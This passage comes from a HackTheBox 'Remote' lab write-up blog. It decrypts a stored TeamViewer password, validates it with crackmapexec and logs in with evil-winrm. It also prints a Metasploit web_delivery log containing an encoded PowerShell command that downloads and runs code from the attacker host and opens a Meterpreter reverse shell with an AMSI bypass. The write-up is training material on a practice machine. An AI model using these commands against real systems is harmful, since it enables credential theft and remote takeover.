<span class="n">iv</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">"0100010067244F436E6762F25EA8D704"</span><span class="p">)</span>
<span class="n">hex_str_cipher</span> <span class="o">=</span> <span class="s">"FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"</span>  <span class="c1"># output from the registry
</span>
<span class="n">ciphertext</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="n">hex_str_cipher</span><span class="p">)</span>

<span class="n">raw_un</span> <span class="o">=</span> <span class="n">AESCipher</span><span class="p">(</span><span class="n">key</span><span class="p">).</span><span class="n">decrypt</span><span class="p">(</span><span class="n">iv</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="n">hexdump</span><span class="p">.</span><span class="n">hexdump</span><span class="p">(</span><span class="n">raw_un</span><span class="p">))</span>

<span class="n">password</span> <span class="o">=</span> <span class="n">raw_un</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-16'</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
</pre></table></code></div></div><h3 id="administrator-credentials">Administrator credentials</h3><p>Running the python decrypt script we get the Administrator credentials as <code class="language-plaintext highlighter-rouge">!R3m0te!</code></p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ python3 TeamViewer_hash_decrypt.py
00000000: 21 00 52 00 33 00 6D 00  30 00 74 00 65 00 21 00  <span class="o">!</span>.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
None
<span class="o">!</span>R3m0te!
</pre></table></code></div></div><h3 id="testing-credentials">Testing credentials</h3><p>We can test these credentials using <code class="language-plaintext highlighter-rouge">crackmapexec</code>:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ crackmapexec smb 10.10.10.180 <span class="nt">-u</span> administrator <span class="nt">-p</span> <span class="s1">'!R3m0te!'</span>
SMB         10.10.10.180    445    REMOTE           <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 <span class="o">(</span>name:REMOTE<span class="o">)</span> <span class="o">(</span>domain:remote<span class="o">)</span> <span class="o">(</span>signing:False<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span>
SMB         10.10.10.180    445    REMOTE           <span class="o">[</span>+] remote<span class="se">\a</span>dministrator:!R3m0te! <span class="o">(</span>Pwn3d!<span class="o">)</span>
</pre></table></code></div></div><p>The <code class="language-plaintext highlighter-rouge">Pwn3d!</code> indicates we are got the correct credentials for Administrator.</p><p>We can use these credentials to login as Administrator with <code class="language-plaintext highlighter-rouge">Evil-WinRM</code> or <code class="language-plaintext highlighter-rouge">psexec</code></p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ evil-winrm <span class="nt">-u</span> administrator <span class="nt">-p</span> <span class="s1">'!R3m0te!'</span> <span class="nt">-i</span> 10.10.10.180

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">whoami
</span>remote<span class="se">\a</span>dministrator
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">exit</span>
</pre></table></code></div></div><h2 id="teamviewer-module--metasploit">TeamViewer Module- Metasploit</h2><p>We can autopwn and find the credentials using the Metasploit module, First we will get a <code class="language-plaintext highlighter-rouge">meterpreter</code> reverse shell using <code class="language-plaintext highlighter-rouge">web_delivery</code> exploit module.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre>msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>RHOST 10.10.10.180
RHOST <span class="o">=&gt;</span> 10.10.10.180
msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LHOST tun0
LHOST <span class="o">=&gt;</span> tun0
msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
payload <span class="o">=&gt;</span> windows/x64/meterpreter/reverse_tcp
msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LPORT 4445
LPORT <span class="o">=&gt;</span> 4445

msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>target 2
target <span class="o">=&gt;</span> 2
msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> run
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exploit running as background job 0.
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exploit completed, but no session was created.

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Started reverse TCP handler on 10.10.14.14:4445
msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Using URL: http://0.0.0.0:8080/VGjNaq
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Local IP: http://10.0.2.15:8080/VGjNaq
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Server started.
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Run the following <span class="nb">command </span>on the target machine:
powershell.exe <span class="nt">-nop</span> <span class="nt">-w</span> hidden <span class="nt">-e</span> WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADoAOAAwADgAMAAvAFYARwBqAE4AYQBxAC8AeQBhADgAYQBwAHMARAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADoAOAAwADgAMAAvAFYARwBqAE4AYQBxACcAKQApADsA
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.180     web_delivery - Delivering AMSI Bypass <span class="o">(</span>939 bytes<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.180     web_delivery - Delivering Payload <span class="o">(</span>2084 bytes<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Sending stage <span class="o">(</span>201283 bytes<span class="o">)</span> to 10.10.10.180
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Meterpreter session 1 opened <span class="o">(</span>10.10.14.14:4445 -&gt; 10.10.10.180:49762<span class="o">)</span> at 2020-09-06 21:40:49 +0530
</pre></table></code></div></div><p>Now since we have a Meterpreter session 1 opened, we can use TeamViewer module to find the credentials:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>msf5 exploit<span class="o">(</span>multi/script/web_delivery<span class="o">)</span> <span class="o">&gt;</span> use post/windows/gather/credentials/TeamViewer_passwords
msf5 post<span class="o">(</span>windows/gather/credentials/TeamViewer_passwords<span class="o">)</span> <span class="o">&gt;</span> show options

Module options <span class="o">(</span>post/windows/gather/credentials/TeamViewer_passwords<span class="o">)</span>:

   Name          Current Setting  Required  Description
   <span class="nt">----</span>          <span class="nt">---------------</span>  <span class="nt">--------</span>  <span class="nt">-----------</span>
   SESSION                        <span class="nb">yes       </span>The session to run this module on.
   WINDOW_TITLE  TeamViewer       no        Specify a title <span class="k">for </span>getting the window handle, e.g. TeamViewer

msf5 post<span class="o">(</span>windows/gather/credentials/TeamViewer_passwords<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>Session 1
Session <span class="o">=&gt;</span> 1
msf5 post<span class="o">(</span>windows/gather/credentials/TeamViewer_passwords<span class="o">)</span> <span class="o">&gt;</span> run

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Finding TeamViewer Passwords on REMOTE
<span class="o">[</span>+] Found Unattended Password: <span class="o">!</span>R3m0te!
<span class="o">[</span>+] Passwords stored <span class="k">in</span>: /root/.msf4/loot/20200906214205_default_10.10.10.180_host.TeamViewer__717224.txt
</pre></table></code></div></div><p>We found the Administrator password <code class="language-plaintext highlighter-rouge">!R3m0te!</code> using Metasploit TeamViewer module.</p><p>And we pwned the Box !</p><p>Thanks for reading, Feedback is appreciated !</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/windows-machines/'>Windows Machines</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/nfs/" class="post-tag no-text-decoration" >NFS</a> <a href="/tags/winpeas/" class="post-tag no-text-decoration" >winpeas</a> <a href="/tags/umbraco/" class="post-tag no-text-decoration" >umbraco</a> <a href="/tags/john/" class="post-tag no-text-decoration" >john</a> <a href="/tags/teamviewer/" class="post-tag no-text-decoration" >TeamViewer</a> <a href="/tags/crackmapexec/" class="post-tag no-text-decoration" >crackmapexec</a> <a href="/tags/nishang/" class="post-tag no-text-decoration" >Nishang</a> <a href="/tags/usosvc/" class="post-tag no-text-decoration" >usosvc</a> <a href="/tags/decrypt/" class="post-tag no-text-decoration" >decrypt</a> <a href="/tags/aes/" class="post-tag no-text-decoration" >AES</a> <a href="/tags/remote/" class="post-tag no-text-decoration" >remote</a> <a href="/tags/sha1/" class="post-tag no-text-decoration" >SHA1</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox — Remote Writeup - b3t4m3&url=http://localhost:4000/posts/RemoteHTB/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox — Remote Writeup - b3t4m3&u=http://localhost:4000/posts/RemoteHTB/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox — Remote Writeup - b3t4m3&url=http://localhost:4000/posts/RemoteHTB/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/PassageHTB/">HackTheBox — Passage Writeup</a></li><li><a href="/posts/Doctor-HTB/">HackTheBox — Doctor Writeup</a></li><li><a href="/posts/Omni-HTB/">HackTheBox — Omni Writeup</a></li><li><a href="/posts/OpenKeys-HTB/">HackTheBox — OpenKeyS Writeup</a></li><li><a href="/posts/SneakyMailer-HTB/">HackTheBox — SneakyMailer Writeup</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ffuf/">ffuf</a> <a class="post-tag" href="/tags/masscan/">masscan</a> <a class="post-tag" href="/tags/nmap/">nmap</a> <a class="post-tag" href="/tags/vhost/">vhost</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/john/">john</a> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/smbclient/">smbclient</a> <a class="post-tag" href="/tags/crackmapexec/">crackmapexec</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Blackfield-HTB/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Oct 8, 2020 <i class="unloaded">2020-10-08T12:20:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox — Blackfield Writeup</h3><div class="text-muted small"><p> Blackfield was a exceptional Windows box centralized on Active Directory environment, initial SMB enumeration reveals potential usernames of Domain accounts. We validate them using kerbrute - a ...</p></div></div></a></div><div class="card"> <a href="/posts/Fuse-HTB/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Nov 3, 2020 <i class="unloaded">2020-11-03T13:20:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox — Fuse Writeup</h3><div class="text-muted small"><p> Fuse is based on Printers in corporate environment making it quite realistic machine, We’ll complete it using both Intended and Unintended method. We start off with web enumeration of a printer ...</p></div></div></a></div><div class="card"> <a href="/posts/Tabby-HTB/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Nov 12, 2020 <i class="unloaded">2020-11-12T12:20:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox — Tabby Writeup</h3><div class="text-muted small"><p> Tabby was a user friendly easy level box put together with interesting attack vectors. We start off with discovering Local File Inclusion (LFI) in a website and leverage it to expose credentials...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/LegacyHTB/" class="btn btn-outline-primary"><p>HackTheBox — Legacy Writeup</p></a> <a href="/posts/LameHTB/" class="btn btn-outline-primary"><p>HackTheBox — Lame Writeup</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//coldfx.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'http://localhost:4000/posts/RemoteHTB/'; this.page.identifier = '/posts/RemoteHTB/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <script data-name="BMC-Widget" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="ColdFusionX" data-description="Your Support means the World to me !" data-message="Thank you for visiting. Hope you liked my Blog!" data-color="#5F7FFF" data-position="" data-x_margin="18" data-y_margin="18"></script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="">Carlos Sequeira</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span> <script src="https://www.hackthebox.eu/badge/163155"></script></p></div><div class="footer-right"><p class="mb-0"><h4>Realm of Knowledge</h4></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ffuf/">ffuf</a> <a class="post-tag" href="/tags/masscan/">masscan</a> <a class="post-tag" href="/tags/nmap/">nmap</a> <a class="post-tag" href="/tags/vhost/">vhost</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/john/">john</a> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/smbclient/">smbclient</a> <a class="post-tag" href="/tags/crackmapexec/">crackmapexec</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
